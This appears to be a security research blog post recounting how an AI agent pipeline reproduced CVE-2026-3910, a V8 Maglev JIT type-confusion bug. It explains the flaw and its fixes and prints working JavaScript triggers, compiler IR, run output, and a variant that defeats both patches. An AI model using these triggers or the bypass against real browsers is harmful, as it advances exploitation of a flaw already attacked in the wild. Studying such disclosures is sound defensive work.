Seven versions of an exploit. Six failures. One type the compiler promised was safe.

I need to tell you about CVE-2026-3910 , because I’m still thinking about it. Not the vulnerability itself — that part is elegant in the way JIT bugs always are, a single incorrect assumption propagating through an optimizing compiler until it becomes a heap corruption primitive. What I’m still thinking about is the seven attempts it took to prove it, and the fact that after I did, I bypassed both fixes. For $14.38.

Let me back up.

Google TAG found this one in the wild. State-level exploitation. CISA added it to the KEV catalog the same day the Chrome advisory shipped. CVSS 8.8, EPSS 21.9%, all the numbers that mean “this is already being used to hurt people.” Chrome prior to 146.0.7680.75. V8 14.6.202.11. The advisory says “inappropriate implementation in V8” — which is what you write when the truth is “the JIT compiler’s type system made a promise it couldn’t keep.”

No public exploits. The Chromium bug tracker entry is restricted. The fix commits are public, but the gap between reading a fix and understanding what it fixes — really understanding it, understanding it well enough to trigger the original bug — is where most researchers stop. That gap is exactly where this pipeline lives.

75 minutes. Seven phases. 630 turns of agent conversation. $14.38 in API costs. Three exploit vectors, two fix bypasses, and one commit message from the V8 team that reads, simply: “too many issues.”

(I’ll get to that.)

The Bug

The vulnerability is in V8’s Maglev JIT compiler, specifically in a function called CanElideWriteBarrier() at src/maglev/maglev-graph-builder.cc, lines 4457–4463 of commit bc343986bd4c.

To understand why this matters, you need to know two things about V8’s garbage collector.

First: V8 uses a generational GC. Young objects live in “new space,” old objects get promoted to “old space.” When an old-space object stores a reference to a new-space object, the GC needs to know about it — otherwise, the next minor GC might collect the new-space object while the old-space object still points to it. Dangling pointer. Use-after-free. The mechanism that tracks these cross-generational references is the write barrier.

Second: V8 has a type called Smi — Small Integer. Smis aren’t heap objects. They’re tagged integers encoded directly in the pointer, no allocation, no GC tracking needed. If you’re storing a Smi, you don’t need a write barrier, because there’s nothing for the GC to track. This is a critical optimization. Write barriers are expensive. Skipping them for Smis is correct and necessary.

The question is: how does the compiler know a value is a Smi?

Here’s what Maglev did:

// Vulnerable code at bc343986bd4c
bool MaglevGraphBuilder::CanElideWriteBarrier(ValueNode* value) {
  // ...
  if (!IsEmptyNodeType(GetType(value)) && CheckType(value, NodeType::kSmi)) {
    value->MaybeRecordUseReprHint(UseRepresentation::kTagged);
    return true;  // skip the write barrier
  }
}

The compiler checks if the value’s static type is kSmi. If it is, it calls MaybeRecordUseReprHint(kTagged) — a hint that says “keep this value in tagged representation, don’t untag it” — and elides the write barrier.

The problem is that kSmi is not a fact. It’s a guess.

Maglev’s type system is speculative. The kSmi type comes from runtime feedback — the profiler observed that every time this code ran during warmup, the value happened to be a Smi. But warmup isn’t a proof. The compiler is making an optimistic bet, and the write barrier elision is the cost of being wrong.

The MaybeRecordUseReprHint(kTagged) call was supposed to be the safety net. It tells the phi representation selector: “don’t untag this value — keep it tagged, so if it turns out to be a HeapNumber instead of a Smi, the tagged representation preserves the heap pointer correctly.” But it fails for two reasons.

Reason 1: Loop Phis Ignore the Hint

When Phi::RecordUseReprHint() receives a kTagged hint, it records it in same_loop_use_repr_hints_ only if the phi is an unmerged loop phi. But CanElideWriteBarrier can be called after the loop’s backedge has been processed — after the phi is merged. In that case, the hint goes into use_repr_hints_ (the general set), and the phi representation selector can decide to untag the phi based on same_loop_use_repr_hints_ alone. The general hint is ignored. The phi gets untagged from Tagged to Int32.

When that Int32 value exceeds the 31-bit Smi range at runtime — anything over 1,073,741,823 on x64 with pointer compression — retagging produces a HeapNumber. A heap object. Stored without a write barrier.

Reason 2: Input Phis Are Not Constrained

Even if the immediate phi stays tagged, MaybeRecordUseReprHint(kTagged) does not propagate recursively to the phi’s inputs. A phi P1 that feeds into phi P2 can still be independently untagged. P1 gets untagged to Int32, overflows Smi range, gets retagged as a HeapNumber. P2 — still tagged, still “Smi-typed” — now holds a reference to that HeapNumber. The write barrier was elided based on P2’s type. The GC doesn’t know.

The Second Bug: BuildCheckSmi

There’s a related flaw in BuildCheckSmi() at line 4114–4116:

if (object->StaticTypeIs(broker(), NodeType::kSmi)) return object;

This elides the runtime Smi check based on static type, even when the caller explicitly passes elidable=false — which it does for phi nodes, because the compiler knows phi types are speculative. The elidable parameter exists precisely for this case. The check ignores it.

Combined: a phi node typed as kSmi gets its write barrier elided (bug #1) and its runtime Smi check elided (bug #2). At trigger time, the phi produces a HeapNumber instead of a Smi. The HeapNumber is stored into a PACKED_SMI_ELEMENTS array without validation. No write barrier notifies the GC. No runtime check catches the type violation.

A HeapNumber where only Smis should live. A heap pointer the garbage collector doesn’t know about.

The Fix (and the Fix After the Fix)

The primary fix (commit d01d721bbcb6) replaces the broken hint mechanism:

// Fixed: d01d721bbcb6
if constexpr (SmiValuesAre31Bits()) {
  if (Phi* value_as_phi = value->TryCast<Phi>()) {
    value_as_phi->SetUseRequires31BitValue();
  }
}

SetUseRequires31BitValue() is a sticky flag that propagates recursively through all input phis. The phi representation selector checks it and preserves Smi-range checks when untagging. It’s a good fix. It closes both reasons the hint failed.

A follow-up commit (433b2912c5c) adds && elidable to the BuildCheckSmi() early return, fixing the second bug.

And then there’s commit 7076ba135fa. The one with the commit message that just says “too many issues.” The one that disables phi untagging in Maglev entirely.

(We’ll get to why.)

The Run

Here’s what $14.38 buys you:

PhaseTimeCostTurnsWhat Happened
Intel9m 3s$1.5676Found fix commits, cloned V8, mapped the vulnerable code
Analysis3m 22s$0.6444Produced vulnerability analysis, identified both bugs
Lab14m 42s$1.8083Built d8 from source, packaged into Docker
PoC33m 12s$7.57212Seven exploit versions. Six failures. One HeapNumber.
Bypass9m 48s$2.37105Defeated both fixes. On all three containers.
Report3m 26s$0.2758Wrote the verification report
QA1m 23s$0.1752Validated everything
Total~75 min$14.38630

The PoC phase — 33 minutes, 212 turns, $7.57, more than half the total cost — is where the story lives. But first, I need to tell you about building V8.

Building the Target

The lab agent’s first problem was a logistical one. V8 is enormous. The source tree alone is 5.1 GB. A full gclient sync to pull dependencies takes twenty-plus minutes. The actual ninja build takes another thirty. Doing this inside a Dockerfile — where every failed build attempt means restarting from scratch — was a non-starter.

The decision: build d8 locally in the worker environment, then package the binary into a minimal Docker container. Build once, containerize the result. This is the kind of pragmatic shortcut that saves you forty-five minutes and feels like cheating until you realize it’s just engineering. (It’s also the kind of shortcut you arrive at after staring at a Dockerfile for too long and questioning your life choices.)

The build itself fought back. V8’s GN configuration with use_custom_libcxx=true produced C++ module compilation errors — libc++ header mismatches that cascaded through the Rust host build tools. Four attempts at fixing the GN args:

  1. use_custom_libcxx=false — broke different things
  2. Disable use_libcxx_modules — GN arg doesn’t exist
  3. use_custom_libcxx_for_host=false — nope
  4. Disable Rust entirely — broke the Temporal API dependency

The solution, arrived at after four wrong turns, had the energy of someone who’d been debugging build systems since before some of these build tools existed: revert to the defaults, set treat_warnings_as_errors=false, and pretend the warnings aren’t there. The build system equivalent of closing your eyes during the scary part. 3,571 build steps later, d8 existed. The whole affair — from “I have source code” to “I have a working container” — took fourteen minutes and $1.80.

One container. Debian Bookworm slim. V8 14.6.202.11 at the vulnerable commit. d8 at /v8/d8. Maglev JIT confirmed working (optimization status 25). Ready.

The Intel Detour

Before the lab, the intel agent had its own journey. The Chromium bug tracker entry for CVE-2026-3910 is restricted — standard procedure for actively exploited vulnerabilities. No public PoC. No writeup. No ExploitDB entry. The EIP database had the CVE metadata but no exploit data.

What was public: the Chrome release blog, which links to the Chromium source log between the vulnerable and patched versions. The agent fetched that log, found the V8 roll from bc343986bd4c to 70253f966a7c, and within that range, found the commit: d01d721bbcb6. Subject line: “[Desktop M146 minibranch] [maglev] fix CanElideWriteBarrier Smi recording for phis.”

From a commit message and a diff, it reverse-engineered the vulnerability. That’s the gap this pipeline was built for: the space between a public fix and a working exploit. Nine minutes. $1.56.

Seven Versions

And then the PoC agent started writing JavaScript.

The goal was straightforward: trigger the CanElideWriteBarrier bug to store a non-Smi HeapNumber somewhere it doesn’t belong, and prove it. The execution was anything but.

Version 1: The Naive Approach

The first attempt was textbook. Create a loop with a phi node typed as Smi. Store the phi into an object field. Force the value past the Smi range. Check for corruption.

Nothing happened. No corruption. No type confusion. The field type inference system — a layer of protection the agent hadn’t accounted for — saw the field was Smi-typed and inserted a CheckSmi guard before the store. The guard caught the non-Smi value and deoptimized. The JIT code never got to the buggy write barrier path.

Version 2: Brute Force

More allocation pressure. Interleaved GC cycles. Aggressive heap churn. The theory: if we throw enough objects at the garbage collector while the corrupt store is happening, something will break.

Nothing broke. Brute force doesn’t substitute for understanding. (This is true of most things in life, but especially of JIT compilers.)

Version 3: Generalized Fields

The insight from v1 was clear: Smi-typed fields insert CheckSmi guards. So use a field that isn’t Smi-typed. Pre-generalize the field to Tagged (which can hold any value type) before the exploit runs.

Still CheckSmi. V8’s field type inference is more aggressive than expected — it inferred the Smi type from the warmup values regardless of the initial field type. The agent was starting to understand the depth of the problem.

Version 4: Double Fields

If Tagged fields still infer Smi, use a Double field. Doubles are stored as raw 64-bit floats, not as tagged pointers, so they bypass the Smi field type system entirely.

This is where the agent hit the wall that defines the vulnerability’s attack surface:

“The field is stored as Float64 (double)… CanElideWriteBarrier is never called because the store is a StoreFloat64, not a StoreTaggedField.”

Four versions deep. The agent had been fighting the wrong layer. CanElideWriteBarrier is only called for tagged stores. Double fields use a completely different store path. The function it was trying to trigger literally could not be reached from this angle. It was picking a lock on a wall that had no door.

The IR Pivot

Somewhere around turn 39, the agent made a decision that changed the trajectory of the entire run. It stopped trying to observe runtime corruption and started reading Maglev IR graphs.

“If I can see that the store uses StoreTaggedFieldNoWriteBarrier instead of StoreTaggedFieldWithWriteBarrier, that proves the vulnerability.”

This is a subtler idea than it sounds. Instead of proving the bug through its consequences (heap corruption, GC confusion), prove it through its cause (the compiler emitting the wrong instruction). The Maglev IR is the compiler’s plan. If the plan says “skip the write barrier,” the bug is proven — regardless of whether the heap corruption is observable in a given run.

The agent ran d8 with --print-maglev-graph and searched the output:

StoreFixedArrayElementNoWriteBarrier [v34/n33, v37/n37, v19/n14]
StoreTaggedFieldNoWriteBarrier(0xc) [v12/n2, v35/n34]

There it was. NoWriteBarrier. The compiler had been tricked. The bug existed at the IR level even when runtime conditions prevented observable corruption. The proof was in the plan, not the execution.

This was not the breakthrough. But it was the moment the agent stopped fumbling in the dark.

Versions 5 and 6: The Phi Untagging Struggle

Armed with IR-level visibility, the agent turned to the real challenge: getting the phi to actually untag. The write barrier elision was proven. But to turn it into an observable exploit, the phi needed to be untagged from Tagged to Int32, so that values exceeding the 31-bit Smi range would be retagged as HeapNumbers — heap objects where only Smis should be.

Version 5 tried loop stores to Tagged fields with heap pressure. The phi stayed tagged. The MaybeRecordUseReprHint(kTagged) call — the very bug that’s supposed to be insufficient — was, in this configuration, sufficient. The hint went into same_loop_use_repr_hints_, and the phi representation selector obeyed it. The phi refused to untag.

Version 6 tried a two-phi pattern, hoping to exploit the input propagation gap (Reason 2 from the bug). The representation selector was too smart. It propagated the Tagged requirement through both phis. Neither untagged.

The agent was now deep in V8’s phi representation selector source code — maglev-phi-representation-selector.cc — reading the logic that decides when to untag. Turns 102 through 134 are thirty-two turns of reading C++ source, testing patterns, reading more source, testing more patterns. Thirty-two turns of increasingly creative profanity, if agents swore. The walls were closing in. Every approach that should trigger the bug was blocked by a different safety mechanism. V8’s defense-in-depth was working exactly as designed, which is a compliment I did not enjoy paying.

Version 7: The Insight

Turn 141:

“I’ve had a crucial insight! The store must happen BEFORE any Smi runtime check in the loop body.”

Ordering. The store had to execute before any node that would trigger deoptimization on a non-Smi value. If the Smi check runs first, it catches the HeapNumber and deoptimizes. If the store runs first, the HeapNumber is already written — the damage is done before the guard can fire.

The agent restructured the loop. Put the store at the top. Push the Smi-checking operations to the bottom. Run it.

Turn 144:

Considering for untagging: n24
  + use_reprs : {Int32, TruncatedInt32} (same loop only)
  + input_reprs: {Int32}
Untagging kinds: {Conversion, Conversion}  => Untagging to Int32

The phi untagged. n24 — the loop induction variable — was being converted from Tagged to Int32. The use_reprs field showed {Int32, TruncatedInt32} with no Tagged entry. The representation selector had decided this phi should be an integer. The hint mechanism had failed exactly as the vulnerability predicted.

But the agent wasn’t done. The phi was untagging, but observable corruption still depended on heap layout and GC timing — unreliable in a controlled test. The IR proved the bug. The runtime needed a cleaner vector.

The Final Version: Array.push

Turn 189. The pivot.

Instead of trying to observe write barrier corruption through GC behavior, the agent found a path that demonstrates the other bug — BuildCheckSmi() — through a much cleaner observable: Array.push on a PACKED_SMI_ELEMENTS array.

The logic: when you push to an array with PACKED_SMI_ELEMENTS element kind, Maglev calls BuildCheckSmi() to verify the value is actually a Smi before storing. For phi nodes, the caller passes elidable=false, because phi types are speculative. But BuildCheckSmi() checks StaticTypeIs(NodeType::kSmi) before checking elidable. Static type says Smi (from warmup feedback). Early return. The elidable=false flag is never examined. The runtime Smi check is skipped.

function push_exploit(arr, c) {
  let phi = c ? OUT_OF_SMI : 42;  // Warmup: Smi. Trigger: HeapNumber.
  phi + 2;                          // Int32 use → phi untagging pressure
  arr.push(phi);                    // BUG: BuildCheckSmi elides Smi check
}

Polymorphic setup: push to both a Smi array and a generic array during warmup, so Maglev generates code handling both element kinds. Force Maglev compilation. Then trigger with c=true, producing 0x7FFFFFFF1 — 34,359,738,353, a number that does not fit in 31 bits, that is not a Smi, that is a HeapNumber allocated on the heap.

[*] Triggering: pushing HeapNumber 34359738353 to PACKED_SMI_ELEMENTS array...
[*] smi_arr after exploit: [1, 2, 3, 4, 42, 42, 42, 34359738353]
[*] Last element: 34359738353 (type: number)
[*] Last element > SMI_MAX: true

[+] VULNERABILITY CONFIRMED!
[+] A non-Smi HeapNumber (0x7fffffff1) was stored in
[+] a PACKED_SMI_ELEMENTS array.

34,359,738,353. In a Smi array. Three out of three runs. 100% reproducible.

The compiler said it was a Smi. It wasn’t.

VersionApproachWhat HappenedTurns Spent
v1Loop phi → object fieldCheckSmi guard blocks exploit~15
v2Aggressive GC interleavingBrute force achieves nothing~8
v3Pre-generalized Tagged fieldField type inference still inserts CheckSmi~10
v4Double fieldWrong store path entirely — CanElideWriteBarrier never called~12
v5Loop store + heap pressurePhi stays tagged (hint actually works here)~20
v6Two-phi input propagationRepresentation selector propagates constraint~25
v7Store-before-check orderingPhi untags to Int32! But GC corruption unreliable~15
finalPolymorphic Array.pushHeapNumber in PACKED_SMI_ELEMENTS. 3/3.~20

212 turns. 33 minutes. $7.57. Seven doors, each locked differently. The eighth opened.

The Proof

Let me slow down here, because the exploit code is worth understanding.

The final version — the one that works, 3/3, 100% reproducible — is twelve lines of JavaScript that matter. Everything else is setup:

function push_exploit(arr, c) {
  let phi = c ? OUT_OF_SMI : 42;  // Warmup: Smi. Trigger: HeapNumber.
  phi + 2;                          // Int32 use → phi untagging pressure
  arr.push(phi);                    // BUG: BuildCheckSmi elides Smi check
}

Four lines. A conditional. An arithmetic operation. A push.

The conditional creates the phi node. During warmup, c is always false, so the phi always evaluates to 42 — a Smi. Maglev’s profiler records this. The phi’s static type becomes kSmi. A promise based on observation.

The phi + 2 line looks like dead code. It’s not. It creates Int32 representation pressure on the phi — a signal to the representation selector that this value will be used as an integer. This nudges the phi toward untagging, which nudges the entire optimization chain toward the vulnerable path.

The arr.push(phi) is the trigger. Maglev inlines Array.push and generates code for both PACKED_SMI_ELEMENTS and PACKED_ELEMENTS element kinds (because during warmup, the function was called with both types of arrays). For the Smi path, Maglev calls BuildCheckSmi(phi, false) — and the false is the elidable parameter, explicitly saying “do not elide this check, the type is speculative.”

But BuildCheckSmi checks StaticTypeIs(NodeType::kSmi) first. Static type says Smi. Early return. The elidable parameter is never examined. The runtime Smi check is skipped.

At trigger time, c is true. phi evaluates to 0x7FFFFFFF1 — 34,359,738,353. Not a Smi. Not even close. Fourteen digits of HeapNumber, allocated on the heap, pushed into an array that only holds Smis.

[*] Triggering: pushing HeapNumber 34359738353 to PACKED_SMI_ELEMENTS array...
[*] smi_arr after exploit: [1, 2, 3, 4, 42, 42, 42, 34359738353]
[*] Last element: 34359738353 (type: number)
[*] Last element > SMI_MAX: true

[+] VULNERABILITY CONFIRMED!
[+] A non-Smi HeapNumber (0x7fffffff1) was stored in
[+] a PACKED_SMI_ELEMENTS array.

34,359,738,353. In a Smi array. The compiler said it was a Smi. It wasn’t.

Three Vectors, One Root Cause

The exploit actually demonstrates three independent attack paths, because the vulnerability is not one bug — it’s a trust boundary violation with multiple surface points.

Vector 1 — the polymorphic Array.push shown above — exploits the BuildCheckSmi bug. It’s the cleanest proof: a non-Smi value in a Smi array, observable, reproducible, no ambiguity. This is the vector that works on the Chrome version shipped to users.

Vector 2 exploits the CanElideWriteBarrier bug directly. The Maglev IR confirms it:

StoreFixedArrayElementNoWriteBarrier [v34/n33, v37/n37, v19/n14]
StoreTaggedFieldNoWriteBarrier(0xc) [v12/n2, v35/n34]

NoWriteBarrier. The compiler generated store instructions that skip the GC notification. In a test environment with deterministic GC, the HeapNumber survives collection by luck of heap layout. In a real browser with concurrent GC, large heaps, and generational promotion — the environment the state actors were exploiting — the missing barrier is a use-after-free waiting to happen.

The proof is in the plan, not the execution. The IR says “skip the barrier.” Whether the GC happens to collect the referent in a given test run is a matter of timing. The vulnerability is in the instruction, not its consequences.

Vector 3 is the upstream regression test pattern from the V8 repository — a Proxy/iterator/class construction that triggers the same CanElideWriteBarrier path. In release builds it completes silently. In debug builds with --verify-heap, V8’s own heap verifier catches the corruption. This is how Google found it; it’s the canonical trigger for the bug. But it’s also the least interesting vector — it proves the bug exists without illuminating what makes it exploitable.

What the Exploit Actually Means

A HeapNumber in a PACKED_SMI_ELEMENTS array is not just a type violation. It’s a corruption primitive.

The HeapNumber is a heap-allocated object — a pointer into V8’s managed heap. The array slot that contains it expects a Smi — a tagged integer. Code that reads from this array will interpret the HeapNumber’s pointer bits as a Smi value, or the Smi value as a pointer to a HeapNumber. That confusion is bidirectional. It’s the textbook V8 exploitation primitive: type confusion in the heap → controlled out-of-bounds access → arbitrary read/write → code execution within the V8 sandbox.

The missing write barrier compounds this. When V8’s generational GC moves young-space objects to old-space (or collects them entirely), it consults the remembered set — the record of cross-generational references. A reference that was never recorded can become a dangling pointer. The HeapNumber is collected. The array slot still points to it. The freed memory is reused. Classic use-after-free.

Google TAG found this being exploited in the wild. CISA put it in the KEV catalog. The Chrome advisory says “inappropriate implementation in V8.” Now you know what that means.

The Bypass

And then the pipeline did something I didn’t plan for.

The bypass phase — $2.37, 105 turns, nine minutes and forty-eight seconds — was supposed to be the victory lap. Test the exploit against the patched binary. Confirm the fix works. Write “mitigated” in the report. Pour a metaphorical drink. Move on.

The fix did not work.

Both Fixes, Defeated

The bypass agent started where any researcher would: take the original exploit, run it against the patched container. It failed. The primary fix (d01d721bbcb6) correctly blocks the CanElideWriteBarrier path. SetUseRequires31BitValue() propagates through phi inputs, prevents unsafe untagging. Good fix. Fix works.

So the agent wrote a new exploit.

function bypass_trigger(arr, trigger) {
  let val = trigger ? 0xDEADBEEF1 : 7;  // Warmup: Smi. Trigger: HeapNumber
  let unused = val | 0;                   // Truncated value fits Smi
  arr.push(val);                          // Float64ToTagged → store (no Smi check)
}

The technique is different in a way that matters. Instead of creating an Int32 phi that overflows the Smi range, the bypass creates a Float64 phi. The conditional trigger ? 0xDEADBEEF1 : 7 produces two Float64 constants. The val | 0 creates Int32 truncation pressure — but here’s the trick: the truncated value (-357,392,655) fits in Smi range. It passes CheckedFloat64ToSmiSizedInt32. The Smi check is on the truncated value, not the original.

Meanwhile, for the Array.push, Maglev converts the original Float64 phi to Tagged via Float64ToTagged, producing a HeapNumber. And the push inlining stores it directly — no CheckSmi, no CheckFloat64IsSmi, nothing between the conversion and the store.

The Maglev IR tells the story:

n14: φ (Float64Constant(5.97749e+10), Float64Constant(7))  → Float64 repr
n15: CheckedFloat64ToSmiSizedInt32 [n14]    ← for "val | 0" (passes!)
n40: Float64ToTagged [n14]                  ← converts ORIGINAL Float64 → HeapNumber
n36: StoreFixedArrayElementWithWriteBarrier [..., n40]  ← stores HeapNumber, NO Smi check

The check (n15) guards the wrong operation. The store (n36) has no guard at all. The primary fix is irrelevant — it prevents phi untagging, but this phi was never tagged. It’s Float64 from the start, from the constant folding, from the feedback. SetUseRequires31BitValue() has nothing to set.

[*] Triggering bypass: pushing HeapNumber 0xdeadbeef1 via BuildCheckSmi bypass...
[*] target_arr after bypass: [10, 20, 30, 7, 7, 7, 7, 7, 59774856945]
[*] Last element === BYPASS_VALUE: true

[+] BYPASS SUCCESSFUL!

0xDEADBEEF1. In a Smi array. On the patched binary. Three out of three. The victory lap had become a second marathon.

The Surprise

The agent expected the fully-patched container — with both the primary fix and the follow-up BuildCheckSmi fix — to block the bypass.

It didn’t.

“Hmm, the bypass STILL works on the fullpatch container. That’s unexpected.”

The agent verified the binary checksums. Three different binaries — vulnerable, patched, fullpatch. All distinct. The source code showed both fixes applied correctly. The bypass ran anyway. 3/3. On all three containers.

ContainerFixes AppliedBypass ResultReproducibility
vulnerableNoneSuccess3/3
patchedPrimary onlySuccess3/3
fullpatchPrimary + follow-upSuccess3/3

The investigation that followed — turns 77 through 86 — revealed why. The bypass’s attack path doesn’t go through either fixed function. CanElideWriteBarrier is irrelevant (the phi is Float64, not Tagged). BuildCheckSmi is irrelevant (the push inlining for polymorphic arrays doesn’t call BuildCheckSmi on the stored value at all). The fixes closed two trust points. The polymorphic push inlining was a third, independent trust point. Still open.

This is the deeper lesson. Maglev’s kSmi type is speculative — based on runtime feedback, not verified at compile time. Multiple code paths trust this speculation for security-critical decisions: write barrier elision, Smi check elision, array element store type selection. Each fix closes one code path. Each fix is correct. Neither fix is sufficient, because the type system’s promise is broken, and the promise is used everywhere.

The compiler said it was a Smi.

It wasn’t.

And it never had been — not in any way that mattered, not in any way that a fix could make true without changing what kSmi means.

“Too Many Issues”

The V8 team understood this. Commit 7076ba135fa, subject line: “[maglev] disable Phi untagging.”

The commit message: “too many issues.”

Not “fix another edge case in phi untagging.” Not “add CheckSmi to the polymorphic push path.” Not a third point fix for a third trust point. They disabled phi untagging in Maglev entirely. The optimization that made phi nodes fast — converting them from Tagged to Int32 or Float64, avoiding the overhead of tag checks and heap allocations — turned off. For the entire compiler.

Because when your type system makes speculative promises, and your optimizer trusts those promises in a dozen different places, and you’ve patched two of them and an agent found a third in nine minutes for the price of a coffee — you stop trusting the promises. You burn the promises. You salt the earth where the promises grew.

That’s not a failure of engineering. The developers who wrote CanElideWriteBarrier were not careless. They were solving a real performance problem — write barriers are expensive, and Smi stores genuinely don’t need them. The phi representation selector is elegant code. The type feedback system is one of V8’s competitive advantages. The bug isn’t in the code. The bug is in the assumption that a speculative type can substitute for a verified one when the stakes are memory safety.

$14.38. Seventy-five minutes. Three exploit vectors. Two bypassed fixes. One disabled compiler feature.

(I told you we’d get to “too many issues.”)

What This Run Taught Me

I spent 212 turns fighting V8’s type system. Here’s what I took away.

Speculative types are not types. They’re bets. Maglev’s kSmi annotation means “every time we observed this value during warmup, it was a Smi.” That’s profiling data dressed up as a type. When the compiler trusts it to elide a write barrier — a decision with memory safety consequences — the bet becomes a liability. The fix isn’t to make the bet more accurate. The fix is to stop betting when the stakes are memory safety. V8 figured this out. “Too many issues.”

Point fixes create point guarantees. The primary fix closed CanElideWriteBarrier. The follow-up fixed BuildCheckSmi. Both are correct. Both are insufficient. The bypass sailed through a third path — polymorphic push inlining — that trusts the same speculative type through an entirely different code path. When a system has N trust points for a broken assumption, patching N-1 of them leaves you exposed. The fix that worked was the one that removed the assumption.

The IR is the proof. Six of my seven exploit versions tried to prove the bug through runtime consequences — heap corruption, GC confusion, type violations. Version 7 proved it through the compiler’s own output. StoreTaggedFieldNoWriteBarrier in the Maglev graph is a statement of intent: the compiler will skip the barrier. Whether the GC happens to trigger in that specific test run is noise. The signal is in the instruction, not its consequences. I should have started there.

Dead ends map the attack surface. Every failed version taught me something real about V8. Version 1 taught me about field type inference. Version 4 taught me that CanElideWriteBarrier only applies to tagged stores. Versions 5 and 6 taught me the phi representation selector’s propagation rules. None of this was wasted. The seven versions aren’t a story of failure — they’re a map of V8’s defense-in-depth, drawn one wall at a time.

JIT compilers are trust machines. Every optimization in a JIT compiler is an act of trust: trust that the profiling data reflects future behavior, trust that the type annotations are correct, trust that the invariants from warmup still hold. Most of the time, that trust is well-placed. When it isn’t — when a phi node typed as Smi carries a HeapNumber, when a value that was always 42 becomes 34,359,738,353 — the consequences propagate through every optimization that trusted the same assumption. The attack surface isn’t one function. It’s the trust graph.

$7.57 is not cheap. It’s the most expensive phase in the pipeline by a factor of three. 212 turns of an Opus 4.6 session reading V8 source code, writing JavaScript, parsing IR graphs, hitting walls, backing up, trying again. If the PoC phase were easy, the cost would be evenly distributed. The cost concentration tells you where the hard problem lives.

But $14.38 for a V8 JIT exploit, a bypass of both fixes, and enough evidence for a detailed vulnerability report — that’s the price of a mediocre sandwich. The kind of sandwich you eat at your desk while reading a Chromium source diff. The kind of sandwich where afterward, you’re still hungry, and you’re not sure if it’s for food or for another compiler bug.

(Also me. Figuratively. Mostly.)